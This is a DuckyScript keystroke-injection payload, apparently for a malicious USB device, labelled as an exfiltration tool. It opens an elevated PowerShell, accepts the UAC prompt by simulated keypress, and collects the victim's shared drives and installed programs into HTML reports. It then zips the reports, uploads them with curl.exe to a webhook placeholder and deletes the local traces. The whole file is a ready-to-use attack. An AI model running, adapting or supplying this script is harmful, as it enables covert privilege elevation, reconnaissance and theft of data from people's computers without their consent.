REM###################################################################################################
REM Author: B4ph0m3th based on UNC0V3R3D's original script (UNC0V3R3D#8662 on Discord)
REM Description: Extracts Important Data from the PC to a file, archive it and sends it to a webhook.
REM Version:	1.0
REM Category:	Exfiltration
REM###################################################################################################
DELAY 750
WINDOWS r
DELAY 1200
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 750
LEFTARROW
ENTER
DELAY 1200
ALT y
DELAY 1300
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = "$env:USERPROFILE\$env:USERNAME $folderDateTime"; $fileSaveDir = New-Item  ($userDir) -ItemType Directory; $date = get-date; $style = "<style>table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;}</style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style | Out-File "$fileSaveDir\drives_dev.html";$Report = $Report + "<div id=body><h1>$env:USERNAME</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report =  $Report + '<div id=left><h3>Shared Drives/Devices</h3>';$Report =  $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path);$Report = $Report + '</div>';$Report | Out-File "$fileSaveDir\drives_dev.html" -Append 
ENTER
DELAY 1200
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = "$env:USERPROFILE\$env:USERNAME $folderDateTime"; $fileSaveDir = New-Item  ($userDir) -ItemType Directory; $date = get-date; $style = "<style>table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;}</style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style | Out-File "$fileSaveDir\installed_soft.html";$Report = $Report + "<div id=body><h1>$env:USERNAME</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report =  $Report + '<div id=center><h3> Installed Programs</h3> ';$Report =  $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html  Name, Version,InstallDate);$Report = $Report + '</table></div>';$Report | Out-File "$fileSaveDir\installed_soft.html" -Append
ENTER
DELAY 500
STRING Compress-Archive -Path $fileSaveDir -DestinationPath $userDir\drives_dev.zip; $file = "$userDir\drives_dev.zip";$url = "<WEBHOOK_URL>"; Invoke-RestMethod -Uri $url -Method Post -Body ($Body | ConvertTo-Json); curl.exe -F "file1=@$file" $url;
ENTER
DELAY 1000
STRING Compress-Archive -Path $fileSaveDir -DestinationPath $userDir\installed_soft.zip ; $file = "$userDir\installed_soft.zip";$url = "<WEBHOOK_URL>"; Invoke-RestMethod -Uri $url -Method Post -Body ($Body | ConvertTo-Json); curl.exe -F "file1=@$file" $url;Remove-Item $userDir -Force -Recurse;exit
ENTER
